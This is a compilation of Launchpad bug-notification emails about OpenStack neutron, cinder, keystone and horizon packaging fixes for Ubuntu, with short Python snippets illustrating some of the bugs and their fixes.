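# Illustration of the sync ordering bug: port groups are copied to the NB
# DB first, then a port create implicitly adds a default security group,
# so its port group is missing when the ACLs are synced.

def sync_port_groups(neutron_sgs, nb_db):
    # Step 3 of the scenario: copy every SG known *right now* into NB.
    for sg in neutron_sgs:
        nb_db.add("pg_" + sg)

def sync_networks_ports_and_dhcp_opts(neutron_sgs):
    # Step 4: creating the metadata port implicitly creates a default
    # security group -- after port groups were already synced.
    neutron_sgs.append("new_tenant_default")

def sync_acls(neutron_sgs, nb_db):
    # Step 5: every SG's ACLs are committed against its port group.
    for sg in neutron_sgs:
        if "pg_" + sg not in nb_db:
            # The RowNotFound analogue from the report.
            raise LookupError("Cannot find Port_Group with name=pg_" + sg)

neutron_sgs, nb_db = ["existing"], set()
sync_port_groups(neutron_sgs, nb_db)
sync_networks_ports_and_dhcp_opts(neutron_sgs)
try:
    sync_acls(neutron_sgs, nb_db)
except LookupError as exc:
    print(exc)

# What a fix amounts to: make sure port groups for any implicitly created
# security groups exist before (re)running the ACL sync.
sync_port_groups(neutron_sgs, nb_db)
sync_acls(neutron_sgs, nb_db)  # no longer raises
```

The essential point is that any code path that can create a security group after `sync_port_groups` has run leaves `sync_acls` with a dangling reference.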
[Yahoo-eng-team] [Bug 2030773] Please test proposed package
Hello Lucas, or anyone else affected, Accepted neutron into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. 
https://bugs.launchpad.net/bugs/2030773 Title: OVN DB Sync always logs warning messages about updating all router ports Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Triaged Status in Ubuntu Cloud Archive wallaby series: Triaged Status in Ubuntu Cloud Archive xena series: Triaged Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: Reported at: https://bugzilla.redhat.com/show_bug.cgi?id=2225156 The ovn-db-sync script does not check whether the router ports are actually out of sync before adding them to the list of ports that need to be updated. This can create red-herring problems by introducing an irrelevant piece of information [0] in the sync report (especially when run in "log" mode), making the user think that the databases might be out of sync even when they are not. Looking at the code [1] we can see that the comment talks about checking the networks and ipv6_ra_configs changes but it does neither; instead, it adds every router port to the list of ports that need to be updated. # We dont have to check for the networks and # ipv6_ra_configs values. Lets add it to the # update_lrport_list. If they are in sync, then # update_router_port will be a no-op. update_lrport_list.append(db_router_ports[lrport]) This LP is about changing this behavior and checking for such differences in the router ports before marking them to be updated.
[0] 2023-07-24 11:46:31.391 952358 WARNING networking_ovn.ovn_db_sync [req-1081a8a6-82dd-431c-a2ab-f58741dc1677 - - - - -] Router Port port_id=f164c0f1-8ac8-4c45-bba9-8c723a30c701 needs to be updated for networks changed [1] https://github.com/openstack/neutron/blob/c453813d0664259c4da0d132f224be2eebe70072/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L553-L557 = Ubuntu SRU Details = [Impact] See bug description above. [Test Case] Deploy openstack with OVN and multiple routers. Run the ovn-db-sync script and ensure router ports that are not out of sync are not marked to be updated. [Where problems could occur] If the _is_router_port_changed() function had a bug, there would be potential for ports that need updating to be filtered out. Presumably this is not the case, but that is a theoretical potential for where problems could occur. All of these patches have already landed in the corresponding upstream branches. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2030773/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
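The shape of the fix is easy to sketch: compare the two fields the quoted code comment mentions before queueing a port for update. The function and field names below are illustrative, not neutron's actual implementation:

```python
# Hedged sketch: only mark a router port for update when its networks or
# ipv6_ra_configs actually differ between the Neutron DB and OVN NB DB.

def is_router_port_changed(db_port, ovn_port):
    return (sorted(db_port.get("networks", [])) !=
            sorted(ovn_port.get("networks", [])) or
            db_port.get("ipv6_ra_configs", {}) !=
            ovn_port.get("ipv6_ra_configs", {}))

def ports_needing_update(db_ports, ovn_ports):
    # Before the fix: every port landed in this list unconditionally,
    # producing the spurious "needs to be updated" warnings.
    return [pid for pid, db_p in db_ports.items()
            if is_router_port_changed(db_p, ovn_ports.get(pid, {}))]

db = {"p1": {"networks": ["10.0.0.1/24"], "ipv6_ra_configs": {}},
      "p2": {"networks": ["10.0.1.1/24"], "ipv6_ra_configs": {}}}
ovn = {"p1": {"networks": ["10.0.0.1/24"], "ipv6_ra_configs": {}},
       "p2": {"networks": ["10.0.9.1/24"], "ipv6_ra_configs": {}}}
print(ports_needing_update(db, ovn))  # ['p2']
```

With the unconditional append replaced by a real comparison, an in-sync deployment produces an empty update list and no misleading warnings.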
[Yahoo-eng-team] [Bug 2032770] Please test proposed package
Hello Mustafa, or anyone else affected, Accepted neutron into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. 
https://bugs.launchpad.net/bugs/2032770 Title: [SRU] [OVN] port creation with --enable-uplink-status-propagation does not work with OVN mechanism driver Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Triaged Status in Ubuntu Cloud Archive wallaby series: Triaged Status in Ubuntu Cloud Archive xena series: Triaged Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: [Impact] This SRU is a backport of https://review.opendev.org/c/openstack/neutron/+/892895 to the respective Ubuntu and UCA releases. The patch is merged to all respective upstream branches (master & stable/[u,v,w,x,y,z,2023.1(a)]). This SRU intends to add the missing 'uplink-status-propagation' extension to ML2/OVN. This extension is already present and working in ML2/OVS, and it is supported by ML2/OVN but the extension is somehow not added to ML2/OVN. The patch simply adds the missing extension to the ML2/OVN too. The impact of this is visible for the deployments migrating from ML2/OVS to ML2/OVN. The following command fails to work on ML2/OVN: ``` openstack port create --network 8d30fb08-2c6a-42fd-98c4-223d345c8c4f --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa # BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status' ``` The fix corrects this behavior by adding the missing extension. 
[Test Case] - Deploy a Focal/Yoga cloud: - ./generate-bundle.sh -s focal -r yoga --name test-focal-yoga-stack --run --ovn # After the dust settles - ./configure - source ./novarc - openstack port create --network --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa - It should fail with "BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status'" To confirm the fix, repeat the scenario and observe that the error disappears and port creation succeeds. [Regression Potential] The patch is quite trivial and should not affect any deployment negatively. The extension is optional and disabled by default. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2032770/+subscriptions
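The description says the extension is "somehow not added" to ML2/OVN, so the fix is essentially a one-entry change to the driver's supported-extensions list. The class and attribute names below are simplified stand-ins, not neutron's real OVN driver:

```python
# Illustrative sketch of the shape of the fix: the API only accepts an
# attribute if its extension alias is advertised by the mechanism driver.

UPLINK_STATUS_PROPAGATION = "uplink-status-propagation"

class FakeOVNMechDriver:
    # Before the patch the OVN driver's list lacked the alias, so the API
    # rejected 'propagate_uplink_status' with a 400 BadRequest.
    supported_extension_aliases = ["security-group", "port-security"]

class PatchedOVNMechDriver(FakeOVNMechDriver):
    supported_extension_aliases = (
        FakeOVNMechDriver.supported_extension_aliases
        + [UPLINK_STATUS_PROPAGATION])

def accepts_extension(driver, alias):
    return alias in driver.supported_extension_aliases

print(accepts_extension(FakeOVNMechDriver, UPLINK_STATUS_PROPAGATION))    # False
print(accepts_extension(PatchedOVNMechDriver, UPLINK_STATUS_PROPAGATION))  # True
```

This also explains why the regression potential is low: nothing changes for requests that do not send `propagate_uplink_status`.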
[Yahoo-eng-team] [Bug 2051928] [NEW] tests - Python 3.12 - TypeError: Object of type _SentinelObject is not JSON serializable
Public bug reported: Executing unit tests with Python 3.12 results in some test failures which I think are to do with the way the unit tests mock the __json__ method in the tools module:

neutron.tests.unit.api.v2.test_base.RegistryNotificationTest.test_networks_create_bulk_registry_publish
---
Captured traceback:
~~~
Traceback (most recent call last):
  File "/home/jamespage/src/upstream/openstack/neutron/neutron/tests/base.py", line 178, in func
    return f(self, *args, **kwargs)
  File "/home/jamespage/src/upstream/openstack/neutron/neutron/tests/unit/api/v2/test_base.py", line 1300, in test_networks_create_bulk_registry_publish
    self._test_registry_publish('create', 'network', input)
  File "/home/jamespage/src/upstream/openstack/neutron/neutron/tests/unit/api/v2/test_base.py", line 1269, in _test_registry_publish
    res = self.api.post_json(
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/webtest/utils.py", line 34, in wrapper
    return self._gen_request(method, url, **kw)
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/webtest/app.py", line 749, in _gen_request
    return self.do_request(req, status=status,
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/webtest/app.py", line 646, in do_request
    self._check_status(status, res)
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/webtest/app.py", line 675, in _check_status
    raise AppError(
webtest.app.AppError: Bad response: 500 Internal Server Error (not 200 OK or 3xx redirect for http://localhost/networks) b'{"NeutronError": {"type": "HTTPInternalServerError", "message": "Request Failed: internal server error while processing your request.", "detail": ""}}'
~~~
Captured pythonlogging:
~~~
   ERROR [neutron.pecan_wsgi.hooks.translation] POST failed.
Traceback (most recent call last):
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/core.py", line 682, in __call__
    self.invoke_controller(controller, args, kwargs, state)
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/core.py", line 603, in invoke_controller
    result = self.render(template, result)
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/core.py", line 414, in render
    return renderer.render(template, namespace)
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/templating.py", line 23, in render
    return encode(namespace)
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/jsonify.py", line 154, in encode
    return _instance.encode(obj)
  File "/usr/lib/python3.12/json/encoder.py", line 200, in encode
    chunks = self.iterencode(o, _one_shot=True)
  File "/usr/lib/python3.12/json/encoder.py", line 258, in iterencode
    return _iterencode(o, 0)
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/jsonify.py", line 148, in default
    return jsonify(obj)
  File "/usr/lib/python3.12/functools.py", line 909, in wrapper
    return dispatch(args[0].__class__)(*args, **kw)
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/jsonify.py", line 143, in jsonify
    return _default.default(obj)
  File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/jsonify.py", line 129, in default
    return JSONEncoder.default(self, obj)
  File "/usr/lib/python3.12/json/encoder.py", line 180, in default
    raise TypeError(f'Object of type {o.__class__.__name__} '
TypeError: Object of type _SentinelObject is not JSON serializable
Digging in, I can see all of the plugin child calls being updated; however, I don't see them actually being called under Python 3.12. This issue impacts the following unit tests: FAIL: neutron.tests.unit.api.v2.test_base.RegistryNotificationTest.test_network_create_registry_publish FAIL: neutron.tests.unit.api.v2.test_bas
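The failure mode reproduces outside neutron: mock sentinels carry no JSON representation, so the stock encoder raises exactly the TypeError from the traceback, while an encoder that consults a `__json__` hook (the mechanism the tests expect pecan's jsonify machinery to provide) succeeds. This is a stand-alone illustration, not pecan's code:

```python
import json
from unittest import mock

class JsonHookEncoder(json.JSONEncoder):
    """Encoder that consults a __json__ hook before giving up."""
    def default(self, obj):
        hook = getattr(obj, "__json__", None)
        if callable(hook):
            return hook()
        return super().default(obj)

class FakeResource:
    """Stand-in for a mocked plugin object whose __json__ is honoured."""
    def __json__(self):
        return {"id": "fake-net"}

try:
    json.dumps({"id": mock.sentinel.network_id})
except TypeError as exc:
    print(exc)  # Object of type _SentinelObject is not JSON serializable

print(json.dumps({"net": FakeResource()}, cls=JsonHookEncoder))
# {"net": {"id": "fake-net"}}
```

So the tests only pass if the `__json__` hook is actually consulted for the mocked objects; if the dispatch path changed under Python 3.12 and plain sentinels reach the encoder, the 500 above is the result.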
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
** Changed in: cinder (Ubuntu Lunar) Status: New => Won't Fix -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: In Progress Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: New Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: New Status in cinder source package in Lunar: Won't Fix Status in cinder source package in Mantic: In Progress Status in cinder source package in Noble: Fix Released Bug description: [Impact] See bug description for full details but short summary is that a patch landed in Wallaby release that introduced a regression whereby retyping an in-use volume leaves the attached volume in an inconsistent state with potential for data corruption. Result is that a vm does not receive updated connection_info from Cinder and will keep pointing to the old volume, even after reboot. [Test Plan] * Deploy Openstack with two Cinder RBD storage backends (different pools) * Create two volume types * Boot a vm from volume: openstack server create --wait --image jammy --flavor m1.small --key-name testkey --nic net-id=8c74f1ef-9231-46f4-a492-eccdb7943ecd testvm --boot-from-volume 10 * Retype the volume to type B: openstack volume set --type typeB --retype-policy on-demand * Go to compute host running vm and check that the vm is now copying data to the new location e.g. 
b68be47d-f526-4f98-a77b-a903bf8b6c65 which will eventually settle and change to: b68be47d-f526-4f98-a77b-a903bf8b6c65 * And lastly a reboot of the vm should be successful. [Regression Potential] Given that the current state is potential data corruption and the patch will fix this by successfully refreshing connection info I do not see a regression potential. It is in fact fixing a regression. - While trying out the volume retype feature in cinder, we noticed that after an instance is rebooted it will not come back online and be stuck in an error state or, if it comes back online, its filesystem is corrupted. ## Observations Say there are the two volume types `fast` (stored in ceph pool `volumes`) and `slow` (stored in ceph pool `volumes.hdd`). Before the retyping we can see that the volume for example is present in the `volumes.hdd` pool and has a watcher accessing the volume.
```sh
[ceph: root@mon0 /]# rbd ls volumes.hdd
volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9
[ceph: root@mon0 /]# rbd status volumes.hdd/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9
Watchers:
    watcher=[2001:XX:XX:XX::10ad]:0/3914407456 client.365192 cookie=140370268803456
```
Starting the retyping process using the migration policy `on-demand` for that volume either via the horizon dashboard or the CLI causes the volume to be correctly transferred to the `volumes` pool within the ceph cluster. However, the watcher does not get transferred, so nobody is accessing the volume after it has been transferred.
```sh
[ceph: root@mon0 /]# rbd ls volumes
volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9
[ceph: root@mon0 /]# rbd status volumes/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9
Watchers: none
```
Taking a look at the libvirt XML of the instance in question, one can see that the `rbd` volume path does not change after the retyping is completed. Therefore, if the instance is restarted nova will not be able to find its volume, preventing an instance start. Pre retype
```xml
[...]
[...]
```
Post retype (no change)
```xml
[...]
[...]
```
### Possible cause
While looking through the code that is responsible for the volume retype we found a function `swap_volume` which, by our understanding, should be responsible for fixing the association above. As we understand it, cinder should use an internal API path to let nova perform this action. This doesn't seem to happen. (`_swap_
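The reported behaviour boils down to the attachment's connection info going stale after the data moves. This can be modelled with a few invented names (a sketch of the symptom, not cinder or nova code):

```python
# Model of the symptom: the volume's data moves to the new pool, but the
# attachment (what ends up in the libvirt XML) keeps the old RBD path.

def retype(volume, attachment, new_pool, refresh_connection_info):
    volume["pool"] = new_pool  # cinder migrates the data
    if refresh_connection_info:
        # What the fix amounts to: nova receives fresh connection_info
        # and rewrites the domain XML to point at the new pool's path.
        attachment["path"] = volume["pool"] + "/" + volume["name"]
    return attachment

vol = {"name": "volume-81cfbafc", "pool": "volumes.hdd"}
att = {"path": "volumes.hdd/volume-81cfbafc"}

stale = retype(dict(vol), dict(att), "volumes", refresh_connection_info=False)
print(stale["path"])  # still the volumes.hdd path -> reboot finds nothing

fresh = retype(dict(vol), dict(att), "volumes", refresh_connection_info=True)
print(fresh["path"])  # volumes/volume-81cfbafc
```

The stale case corresponds to the "Watchers: none" observation above: the data lives in the new pool while the running domain still references the old one.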
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
** Changed in: cinder (Ubuntu Mantic) Status: New => In Progress ** Changed in: cloud-archive/caracal Status: New => Fix Released ** Changed in: cloud-archive/bobcat Status: New => In Progress -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: In Progress Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: New Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: New Status in cinder source package in Lunar: New Status in cinder source package in Mantic: In Progress Status in cinder source package in Noble: Fix Released
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
Included in most recent snapshots for Caracal ** Changed in: cinder (Ubuntu Noble) Status: New => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: New Status in Ubuntu Cloud Archive caracal series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: New Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: New Status in cinder source package in Lunar: New Status in cinder source package in Mantic: New Status in cinder source package in Noble: Fix Released
[Yahoo-eng-team] [Bug 2004031] Re: User with admin_required in a non cloud_admin domain/project can manage other domains with admin_required permissions
Please can you provide full details of your deployment; specifically which charms and channels you are using and on which base version of Ubuntu. ** Project changed: keystone => charm-keystone ** Changed in: charm-keystone Status: New => Incomplete -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/2004031 Title: User with admin_required in a non cloud_admin domain/project can manage other domains with admin_required permissions Status in OpenStack Keystone Charm: Incomplete Bug description: In a deployment of Openstack Yoga, I have the following policy.json configured in Keystone: https://paste.ubuntu.com/p/F2PMP857mG/. When I create a new domain, a project inside that domain, a user with the role:Admin, and I set the context for that user/project/domain for the CLI, I can perform actions like list and delete instances, images, networks and routers created in the cloud_admin domain domain_id:703118433996472d82713a3100b07432 and cloud_admin project project_id:16264684b58747cba04a98c128f5044f. To manage notifications about this bug go to: https://bugs.launchpad.net/charm-keystone/+bug/2004031/+subscriptions
[Yahoo-eng-team] [Bug 1909581] Re: Install and configure for Red Hat Enterprise Linux and CentOS in horizon
** Also affects: horizon Importance: Undecided Status: New ** No longer affects: horizon (Ubuntu) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/1909581 Title: Install and configure for Red Hat Enterprise Linux and CentOS in horizon Status in OpenStack Dashboard (Horizon): New Bug description: /etc/openstack-dashboard/local_settings needs WEBROOT = '/dashboard/' --- Release: 18.6.2.dev8 on 2019-12-05 11:04:48 SHA: 7806d67529b7718cac6015677b60b9b52a4f8dd7 Source: https://opendev.org/openstack/horizon/src/doc/source/install/install-rdo.rst URL: https://docs.openstack.org/horizon/victoria/install/install-rdo.html To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1909581/+subscriptions
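For reference, the one-line setting the install guide is said to be missing looks like this. The path and value come straight from the bug description; `local_settings` is a Python file on RDO-style installs:

```python
# /etc/openstack-dashboard/local_settings
# On RHEL/CentOS, horizon is served under /dashboard/, so WEBROOT must
# reflect that or static assets and redirects break.
WEBROOT = '/dashboard/'
```

Django-based dashboards conventionally require the value to start and end with a slash.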
[Yahoo-eng-team] [Bug 1928031] Re: neutron-ovn-metadata-agent AttributeError: 'MetadataProxyHandler' object has no attribute 'sb_idl'
** Changed in: openvswitch (Ubuntu) Status: New => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1928031 Title: neutron-ovn-metadata-agent AttributeError: 'MetadataProxyHandler' object has no attribute 'sb_idl' Status in charm-ovn-chassis: Invalid Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive wallaby series: New Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in openvswitch package in Ubuntu: Fix Released Status in neutron source package in Focal: New Status in openvswitch source package in Focal: New Bug description: neutron-ovn-metadata-agent is not able to handle any metadata requests from the instances. Scenario:
* Initially there are some intermittent connectivity issues that are described in LP #1907686   https://bugs.launchpad.net/charm-ovn-chassis/+bug/1907686/comments/9
* The fix for the above is available in the python3-openvswitch package in the ussuri-proposed pocket.   Installed the fix on all neutron-server and compute nodes and restarted neutron-ovn-metadata-agent one by one.
* neutron-ovn-metadata-agent on one of the compute nodes is not able to handle any metadata requests after the restart. (Please note the problem happened with only one ovn-metadata agent and the rest of the agents are good on other compute nodes, so this is some race condition in the IDL.)
The stacktrace shows that both workers 69188/69189 timed out on the OVNSB IDL connection and hence sb_idl is never initialized.
Stacktrace of Attribute error: --
2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server Traceback (most recent call last):
2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server   File "/usr/lib/python3/dist-packages/neutron/agent/ovn/metadata/server.py", line 67, in __call__
2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server     instance_id, project_id = self._get_instance_and_project_id(req)
2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server   File "/usr/lib/python3/dist-packages/neutron/agent/ovn/metadata/server.py", line 84, in _get_instance_and_project_id
2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server     ports = self.sb_idl.get_network_port_bindings_by_ip(network_id,
2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server AttributeError: 'MetadataProxyHandler' object has no attribute 'sb_idl'
2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server
Stacktrace at the restart of neutron-ovn-metadata-agent process:
2021-04-15 22:27:03.803 69124 INFO neutron.common.config [-] /usr/bin/neutron-ovn-metadata-agent version 16.2.0
2021-04-15 22:27:03.832 69124 INFO ovsdbapp.backend.ovs_idl.vlog [-] tcp:127.0.0.1:6640: connecting...
2021-04-15 22:27:03.833 69124 INFO ovsdbapp.backend.ovs_idl.vlog [-] tcp:127.0.0.1:6640: connected
2021-04-15 22:27:03.949 69124 WARNING neutron.agent.ovn.metadata.agent [-] Can't read ovn-bridge external-id from OVSDB. Using br-int instead.
2021-04-15 22:27:03.950 69124 INFO oslo_service.service [-] Starting 2 workers
2021-04-15 22:27:03.985 69188 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connecting...
2021-04-15 22:27:03.986 69189 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connecting...
2021-04-15 22:27:04.005 69124 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connecting...
2021-04-15 22:27:04.006 69188 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connected 2021-04-15 22:27:04.033 69189 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connected 2021-04-15 22:27:04.061 69124 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connected 2021-04-15 22:27:06.129 69124 INFO oslo.privsep.daemon [-] Running privsep helper: ['sudo', '/usr/bin/neutron-rootwrap', '/etc/neutron/rootwrap.conf', 'privsep-helper', '--config-file', '/etc/neutron/neutron.conf', '--config-file', '/etc/neutron/neutron_ovn_metadata_agent.ini', '--privsep_context', 'neutron.privileged.default', '--privsep_sock_path', '/tmp/tmpgncr2rq7/privsep.sock'] 2021-04-15 22:27:06.757 69124 INFO oslo.privsep.daemon [-] Spawned new privsep daemon via rootwrap 2021-04-15 22:27:06.676 69211 INFO oslo.privsep.daemon [-] privsep daemon starting 2021-04-15 22:27:06.678 69211 INFO oslo.privsep.daemon [-] privsep process running with uid/gid: 0/0 2021-04-15 22:27:06.680 69211 INFO oslo.privsep.daemon [-] privsep process running with capabilities (eff/prm/inh): CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_NET_ADMIN|CAP_SYS_ADMIN|CAP_SYS_PTRACE/CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_NET_ADMIN|C
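The traceback above boils down to `MetadataProxyHandler` referencing `self.sb_idl` before the worker's OVN southbound IDL connection ever completed, so the attribute was never assigned. The sketch below is purely illustrative (it is not the neutron code or the actual fix; class and method names are made up) and shows the defensive pattern: when the backend connection is established asynchronously, guard the attribute access so an unready worker fails soft instead of raising AttributeError on every request.

```python
# Illustrative sketch only -- NOT neutron's implementation or fix.
# A handler whose backend IDL handle is assigned asynchronously; if a
# request arrives before the connection succeeds, a bare self.sb_idl
# access raises AttributeError exactly as in the traceback above.

class MetadataProxyHandlerSketch:
    def __init__(self):
        # sb_idl is intentionally NOT set here; a worker would assign
        # it only once the OVN southbound connection is established.
        pass

    def connect(self):
        # Stand-in for a successful IDL connection.
        self.sb_idl = object()

    def handle_request(self):
        idl = getattr(self, "sb_idl", None)
        if idl is None:
            # Connection timed out / never completed: fail soft with a
            # 503-style status instead of an unhandled AttributeError.
            return 503
        return 200


h = MetadataProxyHandlerSketch()
before = h.handle_request()   # backend not connected yet -> 503
h.connect()
after = h.handle_request()    # connected -> 200
```

The point of the sketch is only that the race is between worker startup and the first request; a retry/reconnect of the IDL (which is what restarting the agent effectively does) is the real remedy.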
[Yahoo-eng-team] [Bug 1951261] Re: web-download doesn't work in proxied env
